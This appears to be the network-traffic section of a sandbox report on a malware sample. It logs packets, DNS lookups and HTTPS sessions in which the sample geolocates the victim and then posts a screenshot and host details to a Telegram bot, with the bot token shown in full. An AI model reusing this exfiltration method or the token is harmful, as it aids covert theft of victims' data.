                                                                                                                Nov 18, 2024 09:18:13.315973997 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:13.316040039 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:13.317977905 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:13.317990065 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:13.930875063 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:13.930978060 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:13.935745955 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:13.935762882 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:13.936559916 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:13.953598976 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:13.995342016 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.098015070 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.100512028 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.100868940 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:14.101258039 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:14.101602077 CET49991443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:14.101649046 CET4434999134.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.103379011 CET49991443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:14.103564024 CET49991443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:14.103580952 CET4434999134.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.722778082 CET4434999134.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.729568958 CET49991443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:14.729592085 CET4434999134.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.875695944 CET4434999134.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.876646996 CET4434999134.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.876705885 CET49991443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:14.888961077 CET49991443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:15.152111053 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:15.152170897 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:15.152304888 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:15.161549091 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:15.161572933 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:15.994221926 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:15.994457960 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:15.996164083 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:15.996182919 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:15.996586084 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:15.997618914 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.039326906 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.231589079 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.233563900 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.233592987 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.233886957 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.233903885 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.233983994 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.233989000 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234199047 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234205008 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234226942 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234235048 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234304905 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234313965 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234350920 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234360933 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234385967 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234395027 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234424114 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234436989 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234493971 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234502077 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234538078 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234544992 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234575987 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234585047 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234621048 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234630108 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234646082 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234652996 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234767914 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234786987 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234810114 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234818935 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234831095 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234859943 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234873056 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234901905 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234927893 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234946966 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235152960 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235162973 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235191107 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235207081 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235236883 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235263109 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235271931 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235280037 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235333920 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235341072 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235419989 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235426903 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235466003 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235472918 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235497952 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235519886 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235538960 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235547066 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235562086 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235569000 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235627890 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235634089 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235696077 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235754013 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:17.027103901 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:17.027190924 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:17.030755997 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:17.030836105 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:17.030910969 CET49993443192.168.2.6149.154.167.220

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Nov 18, 2024 09:17:10.536798000 CET4941953192.168.2.61.1.1.1
                                                                                                                Nov 18, 2024 09:17:10.543829918 CET53494191.1.1.1192.168.2.6
                                                                                                                Nov 18, 2024 09:17:12.632610083 CET5500653192.168.2.61.1.1.1
                                                                                                                Nov 18, 2024 09:17:12.640109062 CET53550061.1.1.1192.168.2.6
                                                                                                                Nov 18, 2024 09:18:13.281338930 CET5845253192.168.2.61.1.1.1
                                                                                                                Nov 18, 2024 09:18:13.288364887 CET53584521.1.1.1192.168.2.6

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Nov 18, 2024 09:17:10.536798000 CET192.168.2.61.1.1.10xca9Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                Nov 18, 2024 09:17:12.632610083 CET192.168.2.61.1.1.10xae76Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                Nov 18, 2024 09:18:13.281338930 CET192.168.2.61.1.1.10x33ddStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Nov 18, 2024 09:17:10.543829918 CET1.1.1.1192.168.2.60xca9No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                Nov 18, 2024 09:17:12.640109062 CET1.1.1.1192.168.2.60xae76No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                Nov 18, 2024 09:18:13.288364887 CET1.1.1.1192.168.2.60x33ddNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • ipinfo.io
                                                                                                                • api.telegram.org

                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.64972634.117.59.814432016C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-18 08:17:11 UTC61OUTGET /ip HTTP/1.1
                                                                                                                Host: ipinfo.io
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-18 08:17:11 UTC305INHTTP/1.1 200 OK
                                                                                                                date: Mon, 18 Nov 2024 08:17:10 GMT
                                                                                                                content-type: text/plain; charset=utf-8
                                                                                                                Content-Length: 14
                                                                                                                access-control-allow-origin: *
                                                                                                                via: 1.1 google
                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close
                                                                                                                2024-11-18 08:17:11 UTC14INData Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
                                                                                                                Data Ascii: 155.94.241.187


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.64973334.117.59.814432016C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-18 08:17:12 UTC42OUTGET /country HTTP/1.1
                                                                                                                Host: ipinfo.io
                                                                                                                2024-11-18 08:17:12 UTC448INHTTP/1.1 200 OK
                                                                                                                access-control-allow-origin: *
                                                                                                                Content-Length: 3
                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                date: Mon, 18 Nov 2024 08:17:12 GMT
                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                via: 1.1 google
                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close
                                                                                                                2024-11-18 08:17:12 UTC3INData Raw: 55 53 0a
                                                                                                                Data Ascii: US


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.649739149.154.167.2204432016C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-18 08:17:13 UTC256OUTPOST /bot7520842495:AAGp6iR-yxPgcux3oLWODyICGAWeVDY-0VQ/sendPhoto HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary="5911ef4b-6830-488b-9b69-d419e32ff926"
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 100534
                                                                                                                Expect: 100-continue
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-18 08:17:13 UTC25INHTTP/1.1 100 Continue
                                                                                                                2024-11-18 08:17:13 UTC40OUTData Raw: 2d 2d 35 39 31 31 65 66 34 62 2d 36 38 33 30 2d 34 38 38 62 2d 39 62 36 39 2d 64 34 31 39 65 33 32 66 66 39 32 36 0d 0a
                                                                                                                Data Ascii: --5911ef4b-6830-488b-9b69-d419e32ff926
                                                                                                                2024-11-18 08:17:13 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                                                Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                                                2024-11-18 08:17:13 UTC10OUTData Raw: 31 32 37 36 30 38 33 30 32 33
                                                                                                                Data Ascii: 1276083023
                                                                                                                2024-11-18 08:17:13 UTC131OUTData Raw: 0d 0a 2d 2d 35 39 31 31 65 66 34 62 2d 36 38 33 30 2d 34 38 38 62 2d 39 62 36 39 2d 64 34 31 39 65 33 32 66 66 39 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                                                Data Ascii: --5911ef4b-6830-488b-9b69-d419e32ff926Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                                                2024-11-18 08:17:13 UTC136OUTData Raw: 6e 65 77 20 75 73 65 72 20 63 6f 6e 6e 65 63 74 20 21 0a 49 44 3a 20 66 65 33 63 34 62 38 33 30 35 35 30 35 36 31 34 38 61 36 37 39 34 62 39 61 37 34 63 63 66 36 61 31 36 31 39 30 32 30 38 0a 43 6f 6d 6d 65 6e 74 3a 20 0a 55 73 65 72 6e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 0a 50 43 20 4e 61 6d 65 3a 20 36 30 39 32 39 30 0a 49 50 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 0a 47 45 4f 3a 20 55 53 0a
                                                                                                                Data Ascii: new user connect !ID: fe3c4b83055056148a6794b9a74ccf6a16190208Comment: Username: userPC Name: 609290IP: 155.94.241.187GEO: US
                                                                                                                2024-11-18 08:17:13 UTC146OUTData Raw: 0d 0a 2d 2d 35 39 31 31 65 66 34 62 2d 36 38 33 30 2d 34 38 38 62 2d 39 62 36 39 2d 64 34 31 39 65 33 32 66 66 39 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                                                Data Ascii: --5911ef4b-6830-488b-9b69-d419e32ff926Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                                                2024-11-18 08:17:13 UTC4096OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
                                                                                                                2024-11-18 08:17:13 UTC4096OUTData Raw: e2 e1 f0 db ef 20 f1 1f fc 93 2d 17 fd cb 6f fd 14 6b cf 6b d3 7c 73 6a 96 1e 0c b2 b3 88 b1 8e 09 62 89 4b 1e 48 54 60 33 ef c5 79 9d 56 52 d4 a9 4d af e6 7f 92 39 73 b4 e3 5a 09 ff 00 2a fc d8 94 50 68 af 50 f1 c2 92 96 92 80 3d 12 7b 3b 8b af 86 5a 6d c5 aa ef 9e c6 45 bb 54 fe f6 c6 6c fe 84 9f c2 b6 35 3b 1b 3f 1d f8 7a da e2 ce ec c5 22 b0 96 29 07 26 37 c7 2a c3 fc f6 35 73 c1 df f2 28 e9 df ee 37 fe 84 6a 9d d7 83 51 6f 64 bd d1 75 1b 8d 26 79 4e 64 58 46 e8 d8 fa 94 38 ff 00 0a f9 25 59 29 59 be 56 9b 69 fe 8c fb 9f 62 dc 13 4b 99 34 93 5f aa 23 d0 7c 2d 71 a5 ea 93 6b 5a c6 a9 f6 cb bf 2b 60 73 c2 a2 f7 24 9f 61 fc e9 9e 1d 94 eb 7e 2f d4 f5 e8 81 fb 12 44 2c ad dc 8f f5 98 20 b1 1e d9 1f ad 2b 78 3a f6 fc 84 d6 bc 45 77 7b 6c 0e 4c 11 c6 21 56
                                                                                                                Data Ascii: -okk|sjbKHT`3yVRM9sZ*PhP={;ZmETl5;?z")&7*5s(7jQodu&yNdXF8%Y)YVibK4_#|-qkZ+`s$a~/D, +x:Ew{lL!V
                                                                                                                2024-11-18 08:17:13 UTC4096OUTData Raw: be 45 29 e4 f0 96 9c df d3 1c 33 e9 c7 5e 45 d3 f0 d8 cf b3 be b0 8a de de 29 35 24 5c 0b 75 72 6d 9c ed dc 3f 79 f5 d9 d3 fd ae d5 7a 19 04 d1 ef 52 0a e4 80 40 c6 47 ad 2f 93 11 ff 00 96 49 ff 00 7c 8a 78 00 0c 00 00 f6 af 4a 95 39 c1 fb d2 ba 3c 9a f5 a9 d4 5e ec 2c ca 9a a2 33 e9 b7 08 a3 24 af 15 5b 5a ba 9b 53 d5 75 0b ad 2a de da d6 d8 6a 42 f9 66 85 64 0f 74 e8 4e c6 7d ec 71 8c 9e 00 51 f3 1e 2b 50 80 46 0d 20 45 51 80 00 1e c2 b3 c4 60 e1 5e a4 67 3e 9f f0 3f c8 d7 0d 8f a9 86 a7 28 43 a9 4c 6a 9a 64 1a e5 d8 b7 32 9d 2e da dc 5c 69 e0 c4 f9 fb 62 bb ca a0 83 d0 06 99 d7 77 fb 22 b3 f4 cb 4b 49 ac 74 c5 bf bd 8a d6 ee c2 dd ad d9 2e a3 91 92 54 2e ee 19 4a 2b 7c d9 72 08 20 76 20 f5 c6 df 96 9f dc 5f ca 86 8d 1b ef 22 9f a8 ae 3a 79 44 29 bb c6
                                                                                                                Data Ascii: E)3^E)5$\urm?yzR@G/I|xJ9<^,3$[ZSu*jBfdtN}qQ+PF EQ`^g>?(CLjd2.\ibw"KIt.T.J+|r v _":yD)
                                                                                                                2024-11-18 08:17:13 UTC4096OUTData Raw: 71 aa f8 7a e3 ec 6c b2 0b bb 46 f2 5b 38 0d b9 0e d3 fa 8a c4 f1 26 98 7c 41 67 b5 b4 5b d8 ee 90 7e ea 6d d0 71 ec 7f 79 c8 a7 e9 3a bc 7a 7f 86 f4 48 9e 7d 3a 32 74 e8 1b 17 37 9e 53 7d c1 d0 6d 3c 71 d7 eb 5a 36 5a e4 57 97 71 c0 b7 3a 53 97 cf cb 05 f8 91 ce 01 3c 2e d1 9f ce bc c7 4a a4 1f 34 7a 1d 5e d2 9c d7 24 ba 9e 2b 71 04 96 b7 32 db cc bb 65 89 ca 3a e7 38 20 e0 8e 2a 2c 56 96 bf ff 00 23 1e a9 ff 00 5f 72 ff 00 e8 66 b3 ab ec 70 f3 73 a3 09 4b 76 97 e4 7c 1e 2a 11 85 79 c2 3b 26 d7 e2 25 14 b4 95 a9 8d c2 92 96 8a 00 4a 28 34 50 31 28 a3 14 53 00 a3 14 51 40 c4 a2 8a 28 01 28 a5 34 94 00 94 52 d2 50 30 a4 a5 a4 a0 61 49 4b 49 40 05 21 a5 a4 34 0c 28 a2 8a 00 31 49 8a 5a 43 40 c4 a2 8c 51 8a 06 18 a4 a5 c5 18 a6 02 51 4b 46 28 b8 c6 91 47 6a
                                                                                                                Data Ascii: qzlF[8&|Ag[~mqy:zH}:2t7S}m<qZ6ZWq:S<.J4z^$+q2e:8 *,V#_rfpsKv|*y;&%J(4P1(SQ@((4RP0aIKI@!4(1IZC@QQKF(Gj
                                                                                                                2024-11-18 08:17:14 UTC1605INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Mon, 18 Nov 2024 08:17:14 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 1216
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                {"ok":true,"result":{"message_id":82,"from":{"id":7520842495,"is_bot":true,"first_name":"shapka52bot","username":"shapka52_bot"},"chat":{"id":1276083023,"first_name":"\u043f\u0430\u043c [ \u043f\u043e\u043c\u043e\u0433\u0438 ]","username":"SCOROUMRU","type":"private"},"date":1731917834,"photo":[{"file_id":"AgACAgIAAxkDAANSZzr4CteNLXKO7NSxLbD7YMGqtB0AAmrgMRtpBNlJaBsKWqMsxZ8BAAMCAANzAAM2BA","file_unique_id":"AQADauAxG2kE2Ul4","file_size":1271,"width":90,"height":72},{"file_id":"AgACAgIAAxkDAANSZzr4CteNLXKO7NSxLbD7YMGqtB0AAmrgMRtpBNlJaBsKWqMsxZ8BAAMCAANtAAM2BA","file_unique_id":"AQADauAxG2kE2Uly","file_size":16016,"width":320,"height":256},{"file_id":"AgACAgIAAxkDAANSZzr4CteNLXKO7NSxLbD7YMGqtB0AAmrgMRtpBNlJaBsKWqMsxZ8BAAMCAAN4AAM2BA","file_unique_id":"AQADauAxG2kE2Ul9","file_size":67046,"width":800,"height":640},{"file_id":"AgACAgIAAxkDAANSZzr4CteNLXKO7NSxLbD7YMGqtB0AAmrgMRtpBNlJaBsKWqMsxZ8BAAMCAAN5AAM2BA","file_unique_id":"AQADauAxG2kE2Ul-","file_size":99938,"width":1280,"height":1024}],"caption":"new user conn [TRUNCATED]


                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                3192.168.2.64999034.117.59.81443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-18 08:18:13 UTC61OUTGET /ip HTTP/1.1
                                                                                                                Host: ipinfo.io
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-18 08:18:14 UTC305INHTTP/1.1 200 OK
                                                                                                                date: Mon, 18 Nov 2024 08:18:13 GMT
                                                                                                                content-type: text/plain; charset=utf-8
                                                                                                                Content-Length: 14
                                                                                                                access-control-allow-origin: *
                                                                                                                via: 1.1 google
                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close
                                                                                                                2024-11-18 08:18:14 UTC14INData Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
                                                                                                                Data Ascii: 155.94.241.187


                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                4192.168.2.64999134.117.59.81443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-18 08:18:14 UTC42OUTGET /country HTTP/1.1
                                                                                                                Host: ipinfo.io
                                                                                                                2024-11-18 08:18:14 UTC448INHTTP/1.1 200 OK
                                                                                                                access-control-allow-origin: *
                                                                                                                Content-Length: 3
                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                date: Mon, 18 Nov 2024 08:18:14 GMT
                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                via: 1.1 google
                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close
                                                                                                                2024-11-18 08:18:14 UTC3INData Raw: 55 53 0a
                                                                                                                Data Ascii: US


                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                5192.168.2.649993149.154.167.220443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-18 08:18:15 UTC256OUTPOST /bot7520842495:AAGp6iR-yxPgcux3oLWODyICGAWeVDY-0VQ/sendPhoto HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary="e2171771-5cfd-4b96-afc0-02258389f03e"
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 103439
                                                                                                                Expect: 100-continue
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-18 08:18:16 UTC25INHTTP/1.1 100 Continue
                                                                                                                2024-11-18 08:18:16 UTC40OUTData Raw: 2d 2d 65 32 31 37 31 37 37 31 2d 35 63 66 64 2d 34 62 39 36 2d 61 66 63 30 2d 30 32 32 35 38 33 38 39 66 30 33 65 0d 0a
                                                                                                                Data Ascii: --e2171771-5cfd-4b96-afc0-02258389f03e
                                                                                                                2024-11-18 08:18:16 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                                                Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
